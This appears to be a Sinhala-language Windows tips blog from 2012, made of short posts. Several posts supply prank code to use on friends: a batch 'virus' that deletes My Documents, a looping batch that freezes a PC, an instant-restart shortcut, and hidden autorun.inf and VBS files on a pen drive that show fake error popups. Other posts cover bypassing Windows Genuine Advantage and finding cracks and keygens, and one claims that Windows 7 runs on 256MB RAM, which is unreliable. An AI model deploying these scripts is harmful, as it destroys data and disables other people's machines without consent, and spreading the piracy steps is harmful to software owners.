හැමදේම English වලින් කියවන්න එන්න මගේ අනිත් Site එකට, ගොඩාක් සතුටෙන් මම ආරාධනය කරනව මගේ යාලුවො හැමෝටම

Please come to my other web page to read in English and Sinhala each and every document, you are welcome my dear friends

Thursday, May 31, 2012

අපි අයෙත් අපේ යාළුවා බය කරමුද?


ඔන්න යාළුවනේ මම අද ගෙනාව පොඩිම පොඩි trick එකක්, මේකෙන් ඔයාගේ යාළුවෙක් බයකරන්න පුලුවන් ලේසියෙන්ම, මේකත් ඇත්තටම ගොඩක් අය දන්නව ඇති, නොදන්න එක්කෙනෙක් හරි මේක දැන ගන්න එකයි මට තියන සතුට, ඒකයි මම මේක දැම්මේ, වැඩි කතා ඕනෙ නෑ, මම කරන්න ඕනදේ දාන්නම්, මුලින්ම මේ පහල තියන Code එක copy  කර ගන්නකො


%windir%\system32\shutdown.exe -r -t 00

දැන් Desktop එකේ Shortcut එකක් උඩ Right Click කරල Properties ගන්න


දැන් පහල තියන Target කියන තැන Paste කරන්න, දැන් apply කරල OK කරන්න

හරි මේ ටික විතරයි කරන්න තියෙන්නේ, දැන් මේක Double click කරන්න එහෙම එපා, මේකෙන් වෙන්නේ Computer එක Restart වෙන එකයි,
යාළුවෙක්ට මේ විදිහට කරනවනම් එයා වැඩිපුරම පාවිච්චි කරන එකට මෙහෙම කරන්න, අනිවාර්යෙන් කොල්ලා බයවෙනව, බයවෙලා සමහරවිට හොයා ගන්න ක්‍රමයක් නැතුව ගොඩාක් වෙලා දගලයි, එකක් කියල හිතයි මේක දන්නේ නැති කෙනෙක්නම්, ඉතින් Try කරලම බලන්නකො එහෙනම් යාළුවනේ, කිසිම ප්‍රශ්ණයක් නෑ

~~esh~~

RAM එක වැඩි කර ගමුද ගේමක් නැතුවම?


ඔන්න යාළුවනේ ඔයාලට මම කියන්න හදනදේ ගොඩක් වැදගත් වෙන්නේ හැම වෙලාවෙම RAM එක මදි වෙලා කෑ ගහන අයටයි , Windows7 දාගන්න බැරිව ඉන්න අයටත් ගොඩක් වැදගත් , කොහොමත් RAM  එක අඩු අයට මේක ගොඩක් වටිනවා, ඉතින් මේක පොඩි වැඩක්, මෙහෙම කරන්න, RAM එක 4GB තියන අයට මේක උවමනා වෙන්නේ නෑ, අනිත් අයට ගොඩාක් ඕනේ වේවි, වැඩ්ඩො මේක දැක්කම හිනා වෙයි, ඒත් මේක නොදන්න ගොඩාක් අය ඉන්නවා, අඩුම තරමේ Auto Run එකක්වත් හදා ගන්න දන්නේ නැති අය ඉන්නව, ඒ අයටයි මේක
  1. මුලින්ම My Computer උඩ right click කරලා  properties යන්න
  2. ඊලගට system Protection කියන එක click කරන්න, එතන system Protection යටතේ තියන Advanced කියන එක click කරන්න 
3. එතන තියන performance කියන තැන settings click කරන්න

4. Visual effects යටතේ තියන Custom: කියන එක tick එක කරන්න, ඊට පස්සේ Advanced කියන එක click කරන්න 
5. Advanced වල පහල තියනව virtual memory කියල එකක් එතන තියෙන change එක click කරන්න
 6. Change එක click කරාට පස්සේ උඩම තියන Automatically manage paging  file size for all drives කියන එකේ තියන ටික් tick එක අයින් කරන්න
7. දැන් යාලුවනේ ඔයාලගෙ hard එක Partition කරල තියන විදිහ පහල තියන කො‍ටුව ඇත්ලේ පෙන්නයි

8. මෙතනදි"C" එක (C Partiton)  නැතුව ඔයාලගෙ Hard එකේ free memory එක වැඩි පුරම තියන Partition එක click කරන්න, ඊට පස්සේ පහල තියෙන Customize: කියන එකේ තියන එකට ටික් tick එක දෙන්න.  දැන් Initial size (MB) කියන එකයි Maximum size (MB) කියන දෙකටම 3000 කියල Type කරල set click කරල OK කරන්න.දැන් apply කරල restrat කරල බලන්න, ලොකු වෙනසක් තේරෙයි, දැන් Windows7 උනත් දා ගන්න පුලුවන් 256RAM  තිබ්බත්,~~esh~~

Internet Expolorer අයින් කරලා දාන්න ඕනෙද?

 

ඔන්න යාළුවනේ අපිට සාමාන්‍යයෙන් Internet Explorer ඕනේ වෙන්නේම නෑනේ, අයේ අපිට ගිනි නරියයි, ගූගල් ක්‍රෝම් එකෙනුයි තොර ලෝකයක් නෑනේ, මේව මොකටද නේද යාලුවනේ
ඉතින් ඔයාට ඕනෙනම් මේක අයින් කරලා දාන්න පුලුවන්,ඔන්න ඔනේ නෑ කියල හිතෙනවනම් මෙහෙම කරන්න, ඒක හරිම සිම්පල් ප්ලෑන් එකක්, මම මේ කියල තියන විදිහට කරන්න, මමනම් ඒ මල වදය අයින් කරලයි තියෙන්නේ, වැඩක් නැත්තම් නිකන් තියන් ඉන්නේ මොකටද හේ හේ, එහෙනම් අපි දැන් මේක uninstall කරල දාමු.
I. control panel එක Open කරන්න.
II. දැන් යන්න Program and Features වලට.
III. වම් Sideතියනවා " Turn Windows features on or off "  Click කරන්න.
( Turn Windows features on or off හොයා ගන්න බැරිද? එහෙනම් බලන්න දකුණු පැත්තේ උඩම ඇති View by Category කියල තැනක්, එතනට Large Icons කියල දෙන්න, දැන් බලන්න පොඩ්ඩක්, තියෙනව නේද?
IV. Windows Features screen එකේ තියනවා Internet Explorer 8 කියලා තැනක් check box එක unchecked කරන්න.uncheck කරද්දී box එකක් එයි ඒක Yes කරන්න දැන් OK කරන්න.
V. පොඩි වෙලාවක් යයි, ටිකක් බලන් ඉන්න, ගොඩක් වෙලා යන්නේ නෑ, මටනම් ගියේ තප්පර 15ක් විතරයි
V. දැන් Restart කරන්න. වැඩේ ගොඩේ ගොඩ ඔන්න
ඔන්න එතනින් එහාට මේ මල කරදරේ නැහැ
~~esh~~

Black list වැදුන Windows අපිම Genuine කරමු


අනේ මෙන්න මගෙ  Windows Black list වැදිලා හේ ඔහොම වෙලා ගොඩක් අය කෑ ගහනව, ඇයි මෙහෙම වෙන්නේ? දන්නවද ඔයගෙ Windows Updateවෙන නිසයි මේක වෙන්නේ, අපි වගේ පොඩි මිනිස්සුන්ට කොහෙද ඔරිජිනල් වින්ඩොස් ගන්න සල්ලි, ඒකනේ මෙහෙම වෙන්නේ, සල්ලි තියනවනම් අපිත් ආසයිනේ සල්ලි දීලා ගන්න,
ඔයාගේ එකේ KB971033 කියන File එක update වෙලා තියනවා,
දෑන් මොකද අපි මේකට කරන්නේ, මම ගාව පොඩි විසදුමක් තියනවා, අපි අර update  උන File එක uninstall කරමු, එතකොට හරි,

අපි මේක මෙහෙම කරමු එහෙනම් , පොඩි වැඩක් යාලුවනේ
  • Control Panel එක open කරන්න..
  • Programs and Features කියන එක select කරන්න
  • Installed Updates select කරන්න
  • KB971033 කියල update 1k list එකේ තියෙනවද බලන්න
  • තියනවනම් ඒක click  කරල Uninstall කරන්න.
  1. Run box එක open කරන්න (Windows key + R),
  2. regedit.exe කියල type කරල enter කරන්න
  3. F3 ඔබල එන find එකේ  WGALOGON කියල Type කරන්න
  4. WGALOGON folder එක  Delete කරන්න
  5. Close the registry editor
  6. WgaTray කියන file එක system 32 folder එකෙන් විතරක් නෙමේ dll cache folder එකෙත් delete කරන්න
  7.  දැන් Computer එක Restart කරන්න,
දැන් ආයෙත් Crack එකක් Use කරල Windows Genuine කරගන්න පුලුවන් ඔයාලට මේක හොදින් මතක තියාගන්න ආයෙත් windows update කරන්න දෙන්න එපා ඒක Disable කරන්න හරිද?  දැන් ඔන්න  හේ හේ
~~esh~~

Crack,Serial හොයන්න ලේසිම ක්‍රමයක්

හැමදාම හැමෝටම තියන ප්‍රශ්ණයක් තමයි Crack හරි Serial or Keygen හොයා ගන්නේ කොහොමද කියල, Game එකක් Software එකක් Download කරාම වැඩ කරන්නෙ නෑ, Serial numbers ඉල්ලනවා, ඉතින් මේකට විසදුම තමයි Crack හරි Serial Keygen Download කර ගන්න එක , ඒක ලොකු ප්‍රශ්නයක් හැමොටම, ඒක පුදුම අමාරු එපාම කරපු වැඩක් හැටියටයි හැමොම දකින්නේ, ඒත් ඒ හරියට මේ ගැන දන්නේ නැති නිසයි, අපිට Crack හරි Serial හරි ලේසියෙන්ම හොයන්න ක්‍රමයක් තියනව, පොඩිම පොඩි වැඩක් මේක, Try කරල බලන්නකො මේක කරන්නෙ මෙහෙමයි,
Search කරන්න ඕනේ එකට කලින් 94fbr කියල Type කරල පස්සේ ඔයාට ඕනෙ කරන Soft/Game එකේ නම type කරන්න, දැන් Search පාරක් දෙන්න, දැන් ඕනෙ තරම් Crack, Serial , Keygen එයි
උදාහරණයක් මෙන්න
Search කරන තැන මෙහෙම Type කරන්න -: 94fbr GTAIV
දැන් Search පාරක් දෙන්න
ඔන්න කිසිම ප්‍රශ්ණයක් නෑ වැඩේ ගොඩ, ඕනෙම Keygen එකක් හරි Serial එකක් හරි Crack එකක් හරි මෙහෙම හොයා ගන්න පුලුවන්, දැන් ඔන්න කාගෙන්වත් අහන්න ඕනේ වෙන්නේ නෑ, ඔයාටම වැඩ්ඩා වෙන්නපුලුවන් හැමෝම ඉස්සරහ, අයෙත් වදයකුත් නෑ හොයන්න, හොදයි නේද යාලුවනේ?
~~esh~~


Pen එකෙන් එන Virus වලින් බේරෙන්න ක්‍රමයක්



හැමදාම මම වයිරස් ගැන මොනවා හරි දානවනේ, අද දාන්න යන්නේ වයිරස් වලින් බේරෙන ක්‍රමයක් ගැනයි, සාමාන්‍යයෙන් අපිට තියන ලොකුම වදයක් තමයි අපේ Pen එකෙන් වයිරස් අපේ පරිගණකයට එන එක, හැමොම හිතන් ඉන්නේ සුපිරි වයිරස්ගාර්ඩ් එකක් තිබ්බනම් බය වෙන්න දෙයක් නෑ කියලයි, ඒත් ඇත්ත ඒක නෙමෙයි, වයිරස් ගාර්ඩ් වලින් අල්ලන්න බැරි වයිරස් තියෙනවා, දවසකට අලුතෙන් වයිරස් 250ක් විතර අලුතෙන් එකතු වෙනවලු, මට එකේ ගාණ හරියට මතකනම් නෑ, ඒත් හැමදාම ගොඩක් වයිරස් අපේ ලෝකෙට මුදා හරිද්දි ඒ ඔක්කම අප්ඩෙට් වෙන්නෙ නෑ එක දවසෙන් අපේ වයිරස් ගාර්ඩ් එකට, ඉතින් කොච්චර ස්කෑන් කරත් වැඩක් වෙන්නේ නෑ සමහර වයිරස් වලට, ඉතින් විසදුම මේකයි, මම මේ කියන විදිහට කරන්න,
Pen එක හැමෝටම දීල ගෙදර ගෙනත් එක පාරම ඔයගේ කම්පියුටර් එකට ගහන්න එපා, හැමදේටම කලින් මේ විදිහට කරන්න, ඔයාලා දන්නවනේ අපේ Key Board එකේ තියනව Start කියල Button එකක් (Win Key එක), හරි ඔයා පෙන් එක ගහන්න කලින් ඒ Start Button එකයි Key board එකේ L button එකයි දෙකම එකට Press කරන්න,
Start+L

දැන් Log off වෙයි, දැන් ඔයාගේ Pen එක ගහන්න, ප්‍රශ්ණයක් නෑ, ඊට පස්සේ තප්පර 5ක් 10ක් විතර පොඩ්ඩක් වෙලා ඉන්න, මෙහෙම කරාම Auto Run වැඩ කරන්නේ නෑ, Auto run වැඩ කරන්නේ නැති වෙන්න හදල තියෙන්නේ මම දන්න තරමින් Avast Virus Guard එක විතරයි, ඉතින් ඒක නිසා මෙහෙම කරන එක වැඩි ආරක්ෂාවත් එක්ක හොදයිනේ,
දැන් ආයෙත් Log වෙන්න,
දැන් My Computerගිහින් එක පාරටම Pen එක Open කරන්න හදන්න එපා, එහෙම උනොත් Auto Run තියනවනම් Open වෙලා අපේ Computer එකට වයිරස් Attack කරන්න පුලුවන්, කැමතිනම් ඔයගේ වයිරස් ගාර්ඩ් එකෙන් පොඩි Scan පාරක් දාන්න, දැන් වයිරස් තිබ්බොත් ඒවා වයිරස් ගාර්ඩ් එකෙන්ම අයින් කරන්න,
දැන් My Computer Open කර ගන්න, දැන් ඔයාට තියෙන්නේ මේ ක්‍රමය පොඩ්ඩක් බලන්නයි
Side එකේ පහල ඔයගේ Pen එක පෙන්නනව නේද? එතන Click කරන්න, Pen එක Open වෙයි, පහල තියන එකේ වගේම එතන Pen එක පෙන්නන තැන Click කරන්න, Auto run වැඩ කරන්නේ නෑ, බය වෙන්න දෙයක් නෑ,

Windows XP තියන අයට මේ Explorer එක Open කර ගන්න Folder Mark එක Click කරාම එනවා, උඩ තියනව ඒක පොඩ්ඩක් බලන්නකො, අනිත් එක එහෙම නැත්තම් Address Bar එක Click කරල එතනින් එන ලිස්ට් එකෙන් Pen එක Select කරානම් ඒත් හරි,


මෙහෙම දෙයක් තියනව, Pen එකෙ Auto run විතරයි වැඩ කරන්නේ නැත්තේ, එත් Pen එකේ වයිරස් තියෙන්න පුලුවන්, එවත් අල්ලන්න ක්‍රම තියනව,
හරි ඒකට මෙහෙම කරන්න ඕනේ
ඔයාගේ OS එක Windows7 නම් මෙහෙම කරන්න
Organize ---> Folder and Search Option ---> View



දැන් මෙතනින් 1 කියල මම දීල තියන තැනට ටික් එකක් දාන්න, ඒ කියන්නේ Show hidden files. folders, or drives  තැන Click කරන්න
මෙන්න මේ 2 කියල මම දීල තියන සෙට් දෙකේ ටික් අයින් කරන්න
ඔයාගේ OS එක Windows XPනම් මෙහෙම කරන්න
Tools ---> Folder Option ---> View
දැන් මෙතනින් 1 කියල මම දීල තියන තැනට ටික් එකක් දාන්න, ඒ කියන්නේ Show hidden files. folders, or drives  තැන Click කරන්න
මෙන්න මේ 2 කියල මම දීල තියන සෙට් දෙකේ ටික් අයින් කරන්න

Apply කරල OK කරන්න,
දැන් සිස්ටම් ෆයිල් විදිහට තිබුණ ඕනෙම ෆයිල් එකක් පෙන්නයි, ඔන්න Auto run එකක් Pen එක ඇතුලෙ තියනවනම් දැන් බලා ගන්න පුලුවන්, Hidden කරපු Virus ඔක්කමත් ඔන්න පෙන්නයි, ඔයාල දන්නවද සමහර වයිරස් තියනව අපේ Pen එකේ ෆොල්ඩර් Hidden කරලා වයිරස් ෆොල්ඩර්  අපේ තිබුණ ෆොල්ඩර් නමින් හදනවා, ඉතින් අපි දන්නෙ නැතුව Double Click කලොත් අපේ Computer එකට ඒ Virus එක Attack කරනව නිකම්ම, කොහොමද අපි මේවා හොයා ගන්නේ, හරිම ලේසි, කවදාවත් Folder එකකට Extension එකක් නෑ, එහෙනම් ඒ Virus එකක්,  ඉතින් මෙහෙම ඒවට එකක් තියනවනේ ඔන්න හොයා ගන්න එක ක්‍රමයක්,
තව මෙහෙම තියනවනම් ඒවත් වයිරස් වෙන්න පුලුවන් ගොඩාක් දුරට,
.BAT .EXE .SCR මේ වගේ ඒවා,
ඉතින් දන්නෙ නැති ඕනෙම File එකක් Delete කරල දාල ඔයාට වලින් බේරෙන්න පුලුවන් දැන් කිසිම ප්‍රශ්ණයක් නැතුවම, ගොඩාක් මහන්සි වෙලා මේක ලිවුවේ, ඔයාල දෙයක් ගත්තනම් ලොකු දෙයක්, මේක වරදින්න විදිහක් නෑ කොහොමටවත්ම, ආයෙත් Pen වලින් කරදරයක් නෑ ඔන්න,
ප.ලි.
තවත් දෙයක් මතක් කරල C partition එකේ මොනවත්ම Delete කරන්න නම් එපා, ඒකේ තියෙන්නේ වයිරස් නෙමෙයි, අනිත් කාරණය තමයි සමහරවිට Hidden File පෙන්නන්නෙ නැතිවේයි, ඒ ඔයාගේ Computer එකට දැනටමත් වයිරස් Attack කරල නිසයි, ඒකට හොදම විසඩුම ඔයාගේ Computer එක Format කරල දාන එකයි
~~esh~~



වයිරස් එකක් හදල My Document එක Delete කරල දාමුද?



වයිරස් එකක් හදල My Document එක Delete කරල දාමුද? මේකට කරන්න තියෙන්නේ මෙච්චරයි, හැමදාම වගේම මේකත් Notpad සෙල්ලමක්, මම මේ පහල දීල තියන  Code එක Copy කරල Notepad එකේ paste කර ගන්න,
rmdir C:\Documents and Settings \S\Q
 හේ හේ දැන් මේක Save කරගන්නයි තියෙන්නෙ, හැමදාම මම කියනවනේ Extension එක ගැන මේකෙත් කැමති නමක් දිලා අවසානේ Extension එකට .BATකියල දීලා Save කරන්න, වැඩේ ගොඩ, මේකටත් Auto Run එකක් දාල පාවිච්චි කරන්න පුලුවන් යාළුවනේ
~~esh~~

Monday, May 14, 2012

I have Bought a New Site, All of you welcome


මගෙ යාලුවනේ ඔන්න මම අලුතෙන් මගෙම කියල ඩොමේන් එකක් ගත්තා, අද තමයි ගත්තේ, තවම ඒක මම අප්ඩේට් කරන්න පටන් ගත්තෙවත් නැ, මෙ දැන් ගත්තේ, තව  දවස් 3ක් 4ක් යද්දි ඒක මම කියන්නම්, එන්න මගෙ අලුත් සයිට් එකට මගෙ යාලුවො හැමොම මාත් එක්ක හිටපු,ඒ සයිට් එකේ මේ හැම ඩොක් එකම English තියවනව, අලුතෙන් දාන හැම එකම මම ඒකට දානව, ඔයාලා හැමොම මගේ පේජ් එකට සාදරයෙන් පිලි ගන්නවා
ගොඩක් සතුටෙන් කියන්නේ, මෙන්න ලින්ක් එක, අදින් පස්සෙ අලුත් English  DOC හැම එකම අලුත් පේජ් එකේ දානව යාලුවනේ
Please Come to my new web page my dear friends, you can read each and every document in English
My new Page

Saturday, May 12, 2012

Virus Guard එකේ තත්වය පරික්ෂා කරමුද?


යාලුවනේ ඔයාලා Install කරලා තියන Virus Guard  එක හොදට වැඩ කරනවද කියල අපිට බලන්න පුලුවන් පොඩි ක්‍රමයක් තමයි මම දැන් කියන්න හදන්නේ, අපි අනිවර්යෙන්ම අපේ Virus Guard එක ගැන  දැන ගන්න එපැයි නේද? මේක මේ ලොකයේ තියන හැම Virus Guard  හදන Company එකක්ම එකතුවෙලා හදපු දෙයක්, මේකෙන් ප්‍රමිතිය බලන එක තමයි කරන්නේ,

මේක යොදාගෙන ඔයාලට පුලුවන් ඔයාලගෙ  Virus Guard  එකේ තත්වය පරික්ෂා කරල බලන්න

මේ විදිහට කරන්න,

මුලින්ම Note pad එක Open කරගන්න


(Start---> All Programs---> Accessories----> Notepad )


මේ පහල තියන දේවල් Copy  කර ගන්න, Note pad එකේ Paste කර ගන්න


X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* 

දැන් මේක කැමති තැනක Save කර ගන්න
දැන් වැඩේ හරි, දැන් ඔයාගේ Virus Guard එක හොදයිනම් මේක අල්ලයි ඉක්මනින්, බලන්නකො එහෙනම් වැඩේ Check කරලම

~~esh~~




Tuesday, May 8, 2012

Computer එක Stuck කරල දාමුද?


කාගේ හරි Computer එකක් Stuck කරලම දාන්න පුලුවන් ක්‍රමයක් තමයි මම මේ කියන්න හදන්නේ, මේකෙන් කාටවත් කරදරයක් කරන්න එපා, ඒත් පොඩි ජොලි වැඩක්,

@echo off
:A
start iexplore.exe
start run
start explorer
start dir
start command

මෙතන තියන code එකේ start කියල තියෙන ටික පුලුවන් තරම් Copy කරල Save කර ගන්න,
වැඩියෙන් දැම්මොත්, ඉක්මනින් Stuck වෙයි හේහේ

Ex-:

@echo off
:A
start iexplore.exe
start run
start explorer
start dir
start command
start iexplore.exe
start run
start explorer
start dir
start command
start iexplore.exe
start run
start explorer
start dir
start command

දැන් තියෙන්නේ මේක Save කරන්න Save as ගිහින් ඕක කැමති  නමක් දීලා Save කරන්න පුලුවන්ඊට පිටිපස්සෙන් තියෙන්නේ File එකේ extension එක
මතක් කරල ඔයාල දුන්න නම අවසානෙට මෙහෙම Type කරන්න.  .bat

ඔන්න වැඩේ හරි දැන්,

මේක test කරල බලන්න ඕනෙනම් code වැඩිය දාන්නේ නැතුව test කරල බලන්න. මුකුත් ප්‍රශ්ණයක් වෙන්නේ නැ


මේකෙන් වැඩියෙන් දැම්මොත් අනිවර්යෙන් Stuck වෙනවමයි, හේ හේ, එච්චරයි, මේකටත් Auto run එකක් ලියල දැම්මනම් ගොඩේ ගොඩ
~~esh~~

Monday, May 7, 2012

ඔයාගේ NOKIA Phone එක හදපු රට දන්නවද හරියටම?



මම දැන් කියන්න යන්නේ NOKIA phone පාවිච්චි කරන අයට ගොඩාක් වැදගත් දෙයක්, මේක ගොඩක් වැදගත් වෙයි කියල මම හිතනවා ඔයලා හැමොටම, මුලින්ම ඔයාගේ Phone එකේ IMEI එක හොයා ගන්න, ඒක කරන්නෙ මෙහෙමයි #06# type කරන්න Display එකේදිම, දැන් ඔයාට ලැබෙයි Phone එකේ IMEI එක,
එතන Numbers 15ක් ඇති, දැන් වමේ ඉදන් දකුණට බලාගෙන යද්දි 7 Number වෙනි එකයි 8වෙනි Number එකයි දෙකම බලන්න,
10 or 01  = Finland
20 or 02  = Germany
30 or 03  = Korea
40 or 04  = China
50 or 05  = Brazil, USA, Finland
60 or 06  = HK, China, Mexico
70 or 07 = Finland
80 or 08 = Hungary
91 or 19 = Finland
දැන් බලා ගන්නකො මොකක්ද රට කියල එහෙනම්
~~esh~~

Sunday, May 6, 2012

Auto Run හදන ක්‍රමය



මගෙන් යාළුවෙක් අහපු ප්‍රශ්ණයකටයි මම මේක දාන්න හිතුවෙ, කොහොමද අපි Auto Run එකක් හදා ගන්නේ කියලයි මම මේ කියල දෙන්න හදන්නේ, දන්න අය ගොඩක් ඇති, ඒත් මේක නොදන්න අයටයි මම කියල දෙන්න හිතුවේ, මුලින්ම Note Pad එක Open කර ගන්න,
Start ---> All Programs ---> Accessories ---> notepad
ඊට පස්සේ මම මේ පහල  Type කරල තියන විදිහට Type කරන්න,
[autorun]
open=abc.vbs
මේක උදාහරණයක් විතරයි

මෙතන Open එක ඉස්සරහ තියන නම වෙනුවට අපිට Auto run කර ගන්න ඔනේ කරන File එකේ නම දෙන්න, ඊට පිටිපස්සෙන් තියෙන්නේ File එකේ extension එක, එකත් අනිවාර්යෙන් දෙන්න ඔනේ, ඊට පස්සෙ මේක Save කරද්දි මේ විදිහට කරන්න, මුලින්ම Save as ගිහින් Save as type කියන තැන All Files දෙන්න, Auto run කියන නම දීලා Save කරන්න පුලුවන්, ඒත් මතක් කරල ඔයාල දුන්න නම අවසානෙට මෙහෙම Type කරන්න. .INF

දැන් වැඩේ හරි, මේක තමයි auto run එක

 ~~esh~~

යාළුවන්ව පොඩ්ඩක් බය කරමුද?


හැමොටම ගොඩක් ස්තුතියි මගේ බ්ලොග් එකට ආවට, ඔන්න මම තවත් පොඩි දෙයක් ගෙනවා හැමොටම, මෙහෙමයි ඔයාල දැකල තියනවනේ අපිට අපේ කම්පියුටර් එකෙන් සමහර වෙලාවට එන error මැසේජ්, ඉතින් මම කියල දෙන්න යන්නෙ අපිම එහෙම එකක් හදල යාලුවන්ව පොඩ්ඩක් බය කරන ක්‍රමයක්, මුලින්ම Note Pad එක Open  කර ගන්න,
Start ---> All Programs ---> Accessories ---> notepad
 ඊ ට පස්සේ මම මේ දීලා තියන විදිහට Type කරන්න,
x = msgbox("Your Text Here ",5+16 ," error ")
මෙතන Your Text Here කියන තැන ඔයාට කැමති එකක් Type කරන්න, මේ පහල තියෙන්නෙ පොඩි උදාහරණයක්, මේ විදිහට කරන්න
x = msgbox("Do not enter now your system is risk by virus please contact Nimesh (E.M.N.K.A) number 077123456 or nimeshtech@gmail.com",5+16 ,"Error")
මේක තවත් එකක්
msgbox"Your Text Here.",20,"title Heare"
මේ දෙකම එකක් යටින් එකක් ගානේ Type කරන්න, ගොඩක් දැම්මොත් ගොඩක් error මැසේජ් එයි

හරි දැන් මේක Save කර ගන්න මේ විදිහට කරන්න, මුලින්ම Save as ගිහින් Save as type කියන තැන All Files දෙන්න, කැමති නමක් දීලා Save කරන්න පුලුවන්, ඒත් මතක් කරල ඔයාල දුන්න නම අවසානෙට මෙහෙම Type කරන්න. .VBS

හරි දැන් ඒක Open කරල බලන්න, දැන් හරි, තව පොඩි දෙයක් විතරයි කරන්න තියෙන්නෙ, දැන් Auto Run එකක් හදල යාලුවෙකුට පෙන් එකකට දාලා දෙන්න, යාළුවා අනිවර්යෙන් බයවෙනවා කියල දැම්මොත්, මතක් කරල Auto Run එකයි මේ හදපු එකයි Hide කරල Pen එකට දාල දෙන්න, එතකොට වැඩේ ගොඩ ඔන්න ඔච්චරයි කරන්න තියෙන්නෙ
~~esh~~

Tuesday, May 1, 2012

සුපිරි මොබයිල් පාට්නර් සොෆ්ට්වෙයර් එකක්



සාමාන්‍යයෙන් අපිට ඩොන්ගල් එකෙන් ලැබෙන සොෆ්ට්වෙයර් එකෙන් ගොඩක් දේවල් කරන්න බැ, අපිට හැමවෙලවෙම ඩොන්ගල් එක ගලවලා තමයි කාඩ් දාන්න වෙන්නේ  ඒක පාවිච්චි කරල අපිට ගිණුමේ ශේෂය බලන්නත් බැ, ඩේටා පවිච්චි කරල ඉතිරි ප්‍රමාණය දැන ගන්නත් බැ, ඒව බලන්න නම් අපි සිම් එක ගලවලා ෆොන් එකකට දාලම බලන්න ඔනෙ, මේක මහ වදයක්නෙ, ලේසිම ක්‍රමයක් මම ලග තියනවා, මේ තවත් මොබයිල් පාට්නර් සොෆ්ට්වෙයර් එකක්,මේකෙන් අර හැමදේම කරන්න පුලුවන්, මේ සොෆ්ට්වෙයාර් එකෙන් ඔයාට ඔනේ උන හැමදේම ෆොන් එකෙන් වගේම කර ගන්න පුලුවන්, MMS උනත් යවන්න පුලුවන්, කොල් ගන්නත් පුලුවන්, හැමදේම පුලුවන්
,කරන්න තියෙන්නෙ මෙච්චරයි,
Tools ---> USSD
මෙහෙම කරාම ඔනෙම දෙයක් අපිට ඩොන්ගල් එක ගලවන්නෙ නැතුවම කර ගන්න පුලුවන්

මෙතනින් මේක Download කරගෙනම බලන්නකො, ඔයලගෙ වැඩ ගොඩක් ලේසි වෙයි, මමත් මේක පාවිච්චි කරනව, අවුලක් නැ, නියමයි
මෙතනින් ගන්න

think and do it and try it
~~esh~~

Block වෙන්නේ නැතුව FB එකේ Request දාමු



ඔන්න හැමොටම ලයින් දාන්න ගියාම එකෙන් ඔයාලව Block කරල දාන එක නවත්තන ක්‍රමේ මම ගාව තියනව, මේකත් හරිම සිම්පල් ප්ලැන් එකක් හේහේ, අපි වැඩිපුර request දාල එවා Accept කරේ නැති උනාමයි අපිව Block කරන්නේ, කරන්න තියෙන්නෙ මෙච්චරයි, අපිව accept කරපු නැති අයට දාපු Request ටික Cancel කරන්න එතකොට වැඩේ ඉවරයි, කරන්න තියෙන්නෙ මෙච්චරයි
යන්න මෙතනට, මෙතනින් ඔයාලව Accept කරපු නැති අය බලා ගන්න පුලුවන්, එවා අයින් කරන්නත් පුලුවන්, ගේමක් නැ
Click Here


දැන් ඉතින් බය නතුව හැමොටම ලයින් දාන්න පුලුවන් ඔන්න හේහේ
Think and do it and try it
~~esh~~

මධුර Dictionary ගින්නක් නැතුව වැඩ කරවන ව්දිහ



ගොඩක් අය පාවිච්චි කරන Dictionary එක තමයි මධුර කියන්නේ, ඉතින් මේකේ අව්සානෙට ආපු වර්ෂන් එක තමයි මේක(2006),  මේකේ පොඩි අවුලක් තියනව, මේක Install කරාට ෆොන්ට් එක වැඩ කරන්නේ නැ Win7 වලට,

 ඒකටත් විසදුමක් මන් දෙන්නම්,
මේ ලින්ක් එකෙන්  මධුර Download   ගන්න
මෙතන කොටන්නකො
මුලින්ම Setup File එක උඩ Right Click කරන්න,
එතන එන ලිස්ට් එකේ ඇති Troubleshoot Compatibility කියල එකක්, එක Click කරන්න,
දැන් එයි මෙහෙම එකක් Try Recommended Settings කියල එකක්, එක Click කරන්න,
වැඩේ ගොඩ, දැන් හරි, එත් මෙහෙමත් හරි ගියේ නැතිනම් තව එක ක්‍රමයක් තියනව
inastall කරල ඉවර වෙලා මේ Font එක Download කර ගන්න
මේ ලින්ක් එකෙන් ෆොන්ට් එක Download  කරගන්න,
මෙතනට යන්න
ඊට පස්සේ මේක මෙන්න  මේ Path එකට ගිහින් Paste කරන්න,
C: --> Windows --> Fonts
වැඩේ හරියටම හරි
think and do it and try it
~~esh~~

කැමතිද ඔයාගේ PC එක ගැහැණුද? පිරිමිද? කියල දැන ගන්න



කැමතිද ඔයා වැඩ කරන එක ගැහැණුද? පිරිමිද? කියල දැන ගන්න
මෙන්න වැඩේ, පහල තියන Code එක Copy කරල Note pad එකේ Paste කර ගන්නකො මුලින්ම,

CreateObject("SAPI.SpVoice").Speak"I am your computer and I love you ~~esh~~"

දැන් මේක Save කර ගන්න ඔනෙ මෙහෙමයි,
Save as යන්න

දැන් File menu එක Open කරගෙන ඒකේ File Type එක All File විදිහට තොරන්න
ඔයාට කැමති නමක් දෙන්න, ඒත් අවසානෙට extension එකට .VBS කියල type කරල Save කරන්න,
දැන්  Open කරන්න, හොදට අහන් ඉන්න, එයා කතා කරනවා, දැන් බලන්න එයා මොනවද කියන්නෙ කියලා, මගේ Computer එකනම් ගැහැණු එකක් හේහේ, බලන්න ඔයාලගෙ Computers කොහොමද කියලා, මටත් කියලම යන්න Comment එකක් දාලා 

think and do it and try it
~~esh~~

Shut down Speed එක වැඩිකර ගන්න ඔනේද?



එහෙනම් මෙ විදිහට කරන්න
1) Go to Start then select Run

2) Type 'Regedit' and click ok

3) Find 'HKEY_CURRENT_USER\Control Panel\Desktop'

4) Select 'WaitToKillAppTimeout'

5) Right click and select 'Modify'

6) Change the value to '1000'

7) Click 'OK'

Now select 'HungAppTimeout'

9) Right click and select 'Modify'

10) Change the value to '1000'

11) Click 'OK'

Think and do it and try it~~esh~~

කැමතිද Empty Comment දාන්න?


කැමතිද Facebook එකේ Empty Comment දාන්න? මොකද කියන්නේ? මෙන්න මෙහෙම කරන්න, මේක පොඩිම පොඩි වැඩක්, ලොකු දෙයක් නෙමෙයි
මේ විදිහට කරන්න
empty comment කරන්න ඔනේ තැනට ගිහින් Alt එක ඔබාගෙන මේ Number එක type කරල අත අරින්න, ඊට පස්සේ Enter කරන්න, මෙන්න number එක, 0173, දැන් ඉතින් වැඩේ ගොඩ

ALT+0173

think and do it and try it
~~esh~~

මෙමරි චිප් recover


